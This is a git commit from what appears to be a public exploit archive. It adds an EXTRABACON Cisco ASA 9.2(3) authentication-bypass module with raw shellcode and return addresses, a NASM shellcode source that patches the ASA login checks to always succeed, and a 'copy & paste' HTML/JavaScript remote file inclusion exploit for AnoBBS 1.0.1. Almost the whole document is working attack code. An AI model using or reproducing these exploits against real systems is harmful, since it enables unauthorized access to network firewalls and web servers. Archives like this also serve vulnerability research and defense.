DB: 2016-09-17
3 new exploits Too many to list!
This commit is contained in:
parent
54446fef7a
commit
4aa6d571e7
4 changed files with 1621 additions and 1402 deletions
65
platforms/hardware/remote/40386.py
Executable file
65
platforms/hardware/remote/40386.py
Executable file
|
@ -0,0 +1,65 @@
|
|||
#
|
||||
# Cisco ASA 9.2(3) Authentication Bypass (EXTRABACON Module)
|
||||
#
|
||||
# Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
|
||||
# License: http://opensource.org/licenses/MIT
|
||||
# Release Date: September 15, 2016
|
||||
#
|
||||
# Authors:
|
||||
# Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
|
||||
# Zachary Harding (14C0AA3670E9501ADDFC0176298CD7A969BAA8A1)
|
||||
#
|
||||
# Description:
|
||||
# Additional EXTRABACON module for Cisco ASA version 9.2(3).
|
||||
# This does not use the same shellcode as the Equation Group version,
|
||||
# but accomplishes the same task of disabling the auth functions
|
||||
# in less stages/bytes.
|
||||
#
|
||||
# Build/Run:
|
||||
# 1) Save this file to versions/shellcode_asa923.py
|
||||
# 2) Add the version string to fw_version_check()
|
||||
# 3) Shellcode is for --pass-disable
|
||||
#
|
||||
|
||||
vers = "asa923"
|
||||
|
||||
# there is a jmp esp @ 08 1d 70 1d
|
||||
# 81d701c: e8 ff e4 ff ff call 81d5520 <_ctm_hw_free@@Base+0x50fd0>
|
||||
my_ret_addr_len = 4
|
||||
my_ret_addr_byte = "\x1d\x70\x1d\x08"
|
||||
my_ret_addr_snmp = "29.112.29.8"
|
||||
|
||||
finder_len = 9
|
||||
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
|
||||
finder_snmp = "139.124.36.20.139.7.255.224.144"
|
||||
|
||||
# ROPgadget --binary lina_92-3 --opcode 897dfc8b1685d2
|
||||
# 0x9b78010 = function
|
||||
# 0x9b78000 = byte boundary
|
||||
# 0x8085a40
|
||||
# 0x8085000
|
||||
# preamble has a stack clean up and offset to where we first hijacked execution
|
||||
# 0x9277386
|
||||
preamble_len = 69
|
||||
preamble_byte = "\x31\xc0\x31\xdb\x31\xf6\x31\xc9\x60\x80\xc5\x10\x80\xc2\x07\x04\x7d\x50\xbb\x00\x80\xb7\x09\xcd\x80\x58\xbb\x00\x50\x08\x08\xcd\x80\x68\x31\xc0\x40\xc3\x58\xa3\x10\x80\xb7\x09\xa3\x40\x5a\x08\x08\x61\x68\x86\x73\x27\x09\x80\xc3\x10\xbf\x0b\x0f\x0f\x0f\x89\xe5\x83\xc5\x48\xc3"
|
||||
preamble_snmp = "49.192.49.219.49.246.49.201.96.128.197.16.128.194.7.4.125.80.187.0.128.183.9.205.128.88.187.0.80.8.8.205.128.104.49.192.64.195.88.163.16.128.183.9.163.64.90.8.8.97.104.134.115.39.9.128.195.16.191.11.15.15.15.137.229.131.197.72.195"
|
||||
|
||||
postscript_len = 2
|
||||
postscript_byte = "\x61\xc3"
|
||||
postscript_snmp = "97.195"
|
||||
|
||||
launcher_len = 6
|
||||
launcher_snmp = "144.144.144.144.144.144"
|
||||
launcher_byte = "\x90\x90\x90\x90\x90\x90"
|
||||
|
||||
payload_nop_len = 116
|
||||
payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x1d\x80\xbe\x09\x50\xb8\x05\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3"
|
||||
payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88.195"
|
||||
|
||||
payload_PMCHECK_DISABLE_len = 70
|
||||
payload_PMCHECK_DISABLE_byte = "\x7a\x30\x78\x30\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\x12\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\x80\xb7\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
|
||||
payload_PMCHECK_DISABLE_snmp = "122.48.120.48.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.18.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.128.183.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
|
||||
|
||||
payload_AAAADMINAUTH_DISABLE_len = 66
|
||||
payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\x5a\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
|
||||
payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.90.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
|
90
platforms/hardware/shellcode/40387.nasm
Executable file
90
platforms/hardware/shellcode/40387.nasm
Executable file
|
@ -0,0 +1,90 @@
|
|||
;
|
||||
; Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes)
|
||||
;
|
||||
; Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
|
||||
; License: http://opensource.org/licenses/MIT
|
||||
; Release Date: September 15, 2016
|
||||
;
|
||||
; Author: Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
|
||||
;
|
||||
; Description:
|
||||
; This is not the same shellcode as the Equation Group version,
|
||||
; but accomplishes the same task of disabling the auth functions
|
||||
; in less stages/bytes. Particularly, it is 69 bytes in one stage
|
||||
; instead of 200+ bytes spread across 2 stages.
|
||||
;
|
||||
; Build/Run:
|
||||
; 1) $ nasm shelldisable.nasm
|
||||
; 2) copy resulting shellcode into preamble_byte/preamble_snmp vars
|
||||
; 3) Change launcher_snmp to 6 nops (or remove entirely)
|
||||
;
|
||||
; Note: The offsets given are for 9.2(3), not part of the original release
|
||||
;
|
||||
BITS 32
|
||||
|
||||
SAFERET_OFFSET equ 0x9277386 ; where to continue execution
|
||||
PMCHECK_BOUNDS equ 0x9b78000 ; mprotect for pmcheck()
|
||||
PMCHECK_OFFSET equ 0x9b78010 ; location of pmcheck()
|
||||
ADMAUTH_BOUNDS equ 0x8085000 ; page align for admauth()
|
||||
ADMAUTH_OFFSET equ 0x8085a40 ; location of admauth()
|
||||
|
||||
; we must patch pmcheck() and admauth() to always return true
|
||||
; xor eax, eax = 31 c0
|
||||
; inc eax = 40
|
||||
; ret = c3
|
||||
|
||||
PATCH_CODE equ 0xc340c031 ; gotta love endianess
|
||||
|
||||
; we need to fix the function frame to continue normal operation
|
||||
; eax = 0x0
|
||||
; esi = 0x0
|
||||
; edi = 0x0b
|
||||
; ebx = 0x10
|
||||
; ebp = [esp - 0x4 (ret)] + 0x??
|
||||
FIX_EBP equ 0x48 ; this is 0x58, etc. in some versions
|
||||
FIX_EDI equ 0x0f0f0f0b ; seems static?
|
||||
FIX_EBX equ 0x10 ; seems static?
|
||||
|
||||
_start:
|
||||
|
||||
; these are registers we have to clean up, so we can null them before save
|
||||
xor eax, eax
|
||||
xor ebx, ebx
|
||||
xor esi, esi
|
||||
xor ecx, ecx ; ecx is volatile register
|
||||
|
||||
pusha ; save all registers
|
||||
|
||||
add ch, 0x10 ; ecx = 0x1000
|
||||
add dl, 0x7 ; edx = 0x7
|
||||
add al, 0x7d ; eax = 0x7d
|
||||
|
||||
push eax ; save eax for second call
|
||||
|
||||
mov ebx, PMCHECK_BOUNDS ; ebx = byte boundary for mprotect
|
||||
|
||||
int 0x80 ; sys_mprotect(PMCHECK_BOUNDS, 0x1000, 0x7)
|
||||
|
||||
pop eax ; eax = 0x7d
|
||||
mov ebx, ADMAUTH_BOUNDS ; second function page align
|
||||
|
||||
int 0x80 ; sys_mprotect(ADMAUTH_BOUNDS, 0x1000, 0x7)
|
||||
|
||||
push PATCH_CODE
|
||||
pop eax
|
||||
|
||||
mov dword [PMCHECK_OFFSET], eax ; write patch code to both functions
|
||||
mov dword [ADMAUTH_OFFSET], eax
|
||||
|
||||
popa ; restore all registers
|
||||
|
||||
push SAFERET_OFFSET ; push the safe return address
|
||||
|
||||
; these registers are pre-xored
|
||||
add bl, FIX_EBX
|
||||
mov edi, FIX_EDI
|
||||
|
||||
mov ebp, esp
|
||||
add ebp, FIX_EBP
|
||||
|
||||
ret ; return to safe address
|
61
platforms/php/webapps/40388.html
Executable file
61
platforms/php/webapps/40388.html
Executable file
|
@ -0,0 +1,61 @@
|
|||
<!--
|
||||
# Title: AnoBBS 1.0.1 Remote File Inclusion Exploit
|
||||
# Author: bd0rk || Germany
|
||||
# Tested on: Ubuntu-Linux
|
||||
# Twitter: twitter.com/bd0rk
|
||||
# Greetz: Vadim, x0r_32, rgod, zone-h.org, Michael RaumklanG
|
||||
|
||||
#Vendor-URL: http://www.iterapi.com/index.php?cat=78&art=788
|
||||
#Download-Link: http://www.hotscripts.com/listings/jump/download/90434
|
||||
|
||||
#The $prog_dir-parameter in /anobbs_dev_1.0.1/progs/bbs_auth.php line 7 is vulnerable.
|
||||
|
||||
>>>Exploitcode for Copy&Paste<<<
|
||||
-->
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<title>AnoBBS 1.0.1 Remote File Inclusion Exploit</title>
|
||||
<script language="JavaScript">
|
||||
|
||||
var dir="/progs/"
|
||||
var file="/bbs_auth.php?"
|
||||
var parameter ="prog_dir="
|
||||
var shell="Insert your shellcode here"
|
||||
|
||||
function command() {
|
||||
if (document.rfi.target1.value==""){
|
||||
alert("Exploit failed...");
|
||||
return false;
|
||||
}
|
||||
|
||||
rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
|
||||
rfi.submit();
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
|
||||
<body bgcolor="#000000">
|
||||
<center>
|
||||
|
||||
<p><b><font face="Verdana" size="2" color="#008000">AnoBBS 1.0.1 Remote File Inclusion Exploit</font></b></p>
|
||||
|
||||
<p></p>
|
||||
<form method="post" target="getting" name="rfi" onSubmit="command();">
|
||||
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
|
||||
</font><font color="#FF0000" size="2">&nbps;</font></b>
|
||||
<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
|
||||
<p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
|
||||
</form>
|
||||
<p><br>
|
||||
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
|
||||
</p>
|
||||
|
||||
<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
|
||||
</center>
|
||||
</body>
|
||||
|
||||
</html>
|
||||
|
||||
|
Loading…
Add table
Reference in a new issue